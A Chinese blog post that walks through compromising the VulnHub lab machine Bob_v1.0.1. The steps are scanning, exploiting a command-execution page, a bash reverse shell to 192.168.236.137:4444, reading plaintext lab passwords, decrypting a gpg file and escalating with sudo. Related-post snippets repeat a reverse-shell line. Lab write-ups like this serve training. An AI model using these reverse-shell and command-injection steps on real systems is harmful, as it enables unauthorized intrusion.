Bob_v1.0.1

最新推荐文章于 2024-08-08 21:14:35 发布
最新推荐文章于 2024-08-08 21:14:35 发布
阅读量340 收藏 2
点赞数 2
分类专栏: vulnhub 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/140937165
版权

一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

nmap 192.168.236.161 -p- -A

3、目录扫描

dirsearch -u http://192.168.236.161

二、漏洞探测

步骤一:访问80端口,查看 /robots.txt 文件

步骤二:拼接访问 /dev_shell.php ,是一个命令执行页面

步骤三:执行 whoami | ls ,发现备份文件,下载查看,看到过滤了一些命令

三、GetShell

尝试反弹shell

pwd&echo "bash -i >& /dev/tcp/192.168.236.137/4444 0>&1" | bash

四、提权

步骤一:切换到 /home 目录下,查看

步骤二:查看bob目录下的文件,发现密码文件

步骤三:查看文件,得到 jc 和 seb 的密码

jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

步骤四:在 Documents 下发现一个加密的文件 login.txt.gpg 和一个目录 Secret,解密文件失败,权限不够

gpg -d login.txt.gpg

步骤五:在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh 文件,查看其中内容,是藏头诗,密钥为

HARPOCRATES

步骤六:使用 ssh 登录其他用户,记得端口修改为 25468

步骤七:再次解密,得到bob密码

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

bob:b0bcat_

步骤八:登录bob用户,sudo -l 查看权限,显示为 all

步骤九:sudo su ,成功提权

花椒椒椒
关注
专栏目录
vulnhub靶场,Bob_v1.0.1
m0_63755076的博客
09-27 530
但是发现好像没有读取成功,可能是这个命令解释器的问题,使用python生成一个交互式的shell再次查看。发现里面有jc用户和seb用户的密码,先不适用ssh进行连接,看看他们的家目录里面有什么。说什么ftp的后门,也没搞懂他说的的意思,还有一个gpg文件,但是想要解密就需要拿到密钥。发现是一个学校的官网,查看一下基本内容发现没有什么发现,大概的内容就是学校的网站被黑了。分别访问这几个页面看看都有什么发现,当我们访问这个页面的时候,发现可能是一个命令行。成功获得bob用户的密码,切换为bob用户。
Bob_v1.0.1靶机
weixin_71232352的博客
08-05 221
Bob_v1.0.1靶机
bob_v1.0.1
weixin_73074638的博客
08-08 222
查看文件内容 -> 不知道干嘛的,找了点文献才知道是“藏头诗”得到密钥:【gpg -d login.txt.gpg 解密,没有权限。尝试测试漏洞输入whoami,发现存在漏洞。执行whoami | ls ,发现备份文件。robots.txt文件。
Vulnhub靶机Bob_v1.0.1 writeup
xingjinhao123的博客
02-18 3041
下载地址:https://www.vulnhub.com/entry/bob-101,226/ 信息搜集 扫描IP地址 扫描端口及端口信息 访问80端口并没有发现有用的信息 扫描目录 看到有熟悉的robots.txt,访问看一下 发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令 getshell bash反弹shell bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 &
Bob_v1.0.1靶机渗透测试
weixin_58786230的博客
08-03 339
【代码】Bob_v1.0.1靶机渗透测试。
Bob_v1.0.1靶机复现
weixin_52956666的博客
08-07 283
发现里面说有一个没有保护的shell,电子邮件中包含该shell。有回显,尝试注入一句话木马,发现有的命令不能够执行。切换到家目录,发现有四个用户,切换到bob用户中。之前扫描端口的时候发现ssh开放端口是25468。靶机IP为192.168.112.169。发现可以执行所有操作,直接sudo su。因为免密操作发现有ssh功能,尝试登陆。发现了一个可执行的notes.sh文件。发现还是得从命令执行的地方找突破口。发现首字母都是大写,可能是藏头诗。发现有一个疑似存放密码的地方。sudo -l查看免密操作。
vulnbub系列:Bob_v1.0.1
jq_j37的博客
08-03 369
vulnbub系列:Bob_v1.0.1靶机,打靶文章
BOB_1.0.1靶机详解
weixin_44681307的博客
07-29 424
然后我们在elliot的家目录发现一个txt文件,打开后发现里面有他的密码,也有James用户的密码。找到ip地址后对IP进行一个单独的扫描,发现ssh端口被改到25468了,等会儿登陆时候需要用到。但是关键词被过滤了,我们在ls中级加两个反斜线就发现可以使用ls命令,下面信息有反馈。然后make一下.c文件,这样就出来一个可执行文件,执行后就拿到了root权限。其实几个用户都是一样的,这个靶机并没有什么能利用的点,但是内核漏洞可以利用。wget过来,file一下发现是一个zip文件,我们解压一下。
【vulnhub靶场】Bob_v1.0.1靶机提权
qq_46421742的博客
07-29 320
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
CleanCodeHandbook_v1.0.1.pdf.zip_CleanCodeHandbook_leetcode
07-14
而“CleanCodeHandbook_v1.0.1.pdf.zip”这个压缩包文件包含了这本书的PDF版本,版本号为1.0.1,可能包含了一些更新或修订的内容。 “CleanCodeHandbook_leetcode”标签则表明这个压缩包与LeetCode平台相关。...
BOB1.0.1靶机渗透攻略.pdf
09-21
本篇文档详细介绍了针对名为 Bob 1.0.1 的靶机进行渗透攻击的实战攻略。靶机 Bob 1.0.1 可以在 VulnHub 上找到,这是一个提供实战环境的网站,允许用户下载靶场并进行渗透测试。 渗透攻击过程首先需要使用 Nmap ...
靶机【B2R】Bob:1.0.1
干铮的博客
09-26 1198
Bob:1.0.1 下载链接 https://download.vulnhub.com/bob/Bob_v1.0.1.ova 将靶机ova文件导入vmware中,更改网卡配置为桥接直接使用。 1.信息收集 根据已知靶机mac地址查询ip。 确定目标IP Nmap -sP 192.168.43.0/24 端口扫描 Nmap 192.168.43.169 -A -p- -oN namp.A C:\Users\ASUS>Nmap 192.168.43.169 -A -p-
[Python3] Pandas v1.0 —— (四) 合并数据集
進撃の算法
04-21 1752
文章目录六、合并数据集:Concat与Append操作(一)NumPy数组的合并 np.concatenate()(二)通过 pd.concat 实现简易合并1. 索引重复 六、合并数据集:Concat与Append操作 将不同的数据源进行合并,包括: 将两个不同的数据集简单拼接 用数据库的连接 (join) 与合并 (merge) 操作处理有重叠字段的数据集 # 定义一个能够创建DataF...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8507
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
ssm智能家政保洁预约系统最新完整版程序+论文.zip
10-18
基于SSM框架的智能家政保洁预约系统,是一个旨在提高家政保洁服务预约效率和管理水平的平台。该系统通过集成现代信息技术,为家政公司、家政服务人员和消费者提供了一个便捷的在线预约和管理系统。 系统的主要功能包括: 1. **用户管理**:允许消费者注册、登录,并管理他们的个人资料和预约历史。 2. **家政人员管理**:家政服务人员可以注册并更新自己的个人信息、服务类别和服务时间。 3. **服务预约**:消费者可以浏览不同的家政服务选项,选择合适的服务人员,并在线预约服务。 4. **订单管理**:系统支持订单的创建、跟踪和管理,包括订单的确认、完成和评价。 5. **评价系统**:消费者可以在家政服务完成后对服务进行评价,帮助提高服务质量和透明度。 6. **后台管理**:管理员可以管理用户、家政人员信息、服务类别、预约订单以及处理用户反馈。 系统采用Java语言开发,使用MySQL数据库进行数据存储,通过B/S架构实现用户与服务的在线交互。系统设计考虑了不同用户角色的需求,包括管理员、家政服务人员和普通用户,每个角色都有相应的权限和功能。此外,系统还采用了软件组件化、精化体系结构、分离逻辑和数据等方法,以便于未来的系统升级和维护。 智能家政保洁预约系统通过提供一个集中的平台,不仅方便了消费者的预约和管理,也为家政服务人员提供了一个展示和推广自己服务的机会。同时,系统的后台管理功能为家政公司提供了强大的数据支持和决策辅助,有助于提高服务质量和管理效率。该系统的设计与实现,标志着家政保洁服务向现代化和网络化的转型,为管理决策和控制提供保障,是行业发展中的重要里程碑。
东方财富网抓取上市公司爬虫-EMSpider.zip
最新发布
10-18
东方财富网抓取上市公司爬虫-EMSpider
卫生健康系统-java-基于springBoot智能推荐的卫生健康系统(毕业论文+开题)
10-18
本基于智能推荐的卫生健康系统有管理员和用户两个角色。用户功能有个人中心,健康视频管理,视频类型管理,科室类型管理,医生信息管理,在线预约管理,我的收藏管理等。管理员功能有个人中心,用户管理,健康视频管理,视频类型管理,科室类型管理,医生信息管理,在线预约管理,健康论坛管理,我的收藏管理,留言板管理,系统管理等。因而具有一定的实用性。 本站是一个B/S模式系统,采用Spring Boot框架,MYSQL数据库设计开发,充分保证系统的稳定性。系统具有界面清晰、操作简单,功能齐全的特点,使得基于智能推荐的卫生健康系统管理工作系统化、规范化。
pxe无人值守安装centos
10-18
pxe无人值守安装centos
毕业设计-基于微博情感分析系统Python实现源码+说明文档.zip
10-18
毕业设计_基于微博情感分析系统Python实现源码+说明文档.zip,该项目是个人毕设项目,答辩评审分达到98分,代码都经过调试测试,确保可以运行!欢迎下载使用,可用于小白学习、进阶。该资源主要针对计算机、通信、人工智能、自动化等相关专业的学生、老师或从业者下载使用,亦可作为期末课程设计、课程大作业、毕业设计等。项目整体具有较高的学习借鉴价值!基础能力强的可以在此基础上修改调整,以实现不同的功能。 毕业设计_基于微博情感分析系统Python实现源码+说明文档.zip毕业设计_基于微博情感分析系统Python实现源码+说明文档.zip毕业设计_基于微博情感分析系统Python实现源码+说明文档.zip毕业设计_基于微博情感分析系统Python实现源码+说明文档.zip毕业设计_基于微博情感分析系统Python实现源码+说明文档.zip毕业设计_基于微博情感分析系统Python实现源码+说明文档.zip毕业设计_基于微博情感分析系统Python实现源码+说明文档.zip
STM32F103系列Bootloader-IAP_V1.0.1开发教程
资源摘要信息:"IAP-Bootloader V1.0.rar_Bootloader v1.0.1_IAP_STM32F103的IAP_STM3" 在深入讨论STM32F103系列微控制器的IAP(In-Application Programming)Bootloader之前,我们首先需要了解几个基础概念。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值